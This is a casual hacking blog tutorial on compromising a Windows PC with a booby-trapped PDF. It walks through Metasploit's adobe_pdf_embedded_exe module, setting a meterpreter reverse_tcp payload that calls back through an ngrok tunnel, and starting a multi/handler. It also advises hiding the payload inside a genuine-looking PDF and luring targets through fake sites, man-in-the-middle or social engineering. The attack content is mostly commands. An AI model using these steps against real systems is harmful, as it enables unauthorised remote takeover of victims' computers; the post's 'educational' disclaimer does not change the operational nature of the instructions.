Saturday, October 19, 2019

Hack a pc with pdf using msfconsole

Welcome back to hacking a rise i am the laughing man the one and only laughing man i am him whoop whoop so in this post we will be showing you now to take over a pc with a pdf file there is a load ways we can do this but im going to show you the most simple was with msfconsole on kali linux or parrot you know what any linux system with metasploit installed lol all the commands in msfconsole are the same so fuck it lets start

What is metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7

find out more here

how to perform the hack

Right lad and gals to start the hack i will be using ngrok for forward my ports via ssh you can get ngrok free by download it of there site
ngrok download here

so first of all we need to stat postgresql services you can do this by typing in terminal service postgresql start
Hacking A Rise servicepoststartpdf-1024x752

now we can start ngrok to run on tcp so in terminal type ./ngrok tcp 4444 this will open the port 4444 for are payload to connect on
Hacking A Rise ngroktcp4444

Hacking A Rise ngroktcp4441

as u see the port is now open if you dont wanna use ngrok we have serveo or forward the ports via router follow this link https://www.lifewire.com/how-to-port-forward-4163829

Now we are ready to start msfconsole so open a new terminal and leave the one with ngrok open if u are using ngrok or serveo starting msfconsole may take some time depending on your system
Hacking A Rise msfconsolepdf-1024x755

as u see its loaded
Hacking A Rise msfconsolepdf1-1024x589

now we type search type:exploit platform:windows adobe pdf if you dont know the command to use the exploit
Hacking A Rise msfconsloepdf2-1024x533
there a lot i know

as i use the exploit 100 times before i can just type exploit/windows/fileformat/adobe_pdf_embedded_exe and press y to let it load as i always forget to put use before the exploit lol
Hacking A Rise msfpdf1-1024x86

now we type show options this will show use what input we need to add for this to work annd here we will set the name the pdf file and the payload that we will be using so type out this set FILENAME ELITEHACKINGGUIDE.PDF so now we type show options agen to see whats next
now we type set PAYLOAD windows/meterpreter/reverse_tcp
Hacking A Rise setthenameandpayload-1024x323

now we need to set the lhost and the lport for the payload to connect back to so we type set LHOST 0.tcp.ngrok.io and the LPORT 17140 as u see im using the link and port ngrok gave us for opening port 4444 (note you can add the serveo link or your ip in to the lhost and the port you have open )
Hacking A Rise msfconsole23-1024x152

now for the fun type exploit or run
Hacking A Rise msfconsoleexploitpdf
as u see the file is saves in .msf4 file

Hacking A Rise msf4file

how to get target to download pdf

There are many of ways we can get are target to download the file like beef-xss,man in the middle,upload it to a file hosting site or make a fake site and run it of your pc/laptop or phone to lure the target to download it social engineering is key in this sort of attack then agen most attacks we need good SE skills as we dont want the target to know we are hacking them but saying that we can embed the payload to a pdf file we got online by typing set INFILENAME /root/Documents/hackingpdfs/web-hacking-101.pdf
Hacking A Rise change-pf-1024x191

compared to the first pdf we used we now have it looking more like a real pdf file
Hacking A Rise Screenshot-from-2019-10-19-21-30-26

now we need to start the handler for the payload so type this

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.tcp.ngrok.io
set LPORT 17140

Hacking A Rise sethandler-1024x812

now all we have to do is get the target to download the pdf and boom we have them hahahahaha i dont got a windows laptop here so i cant show you it connected and im not going to get some to download it after all we are white hats now black hats lol

DISCLAMER

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.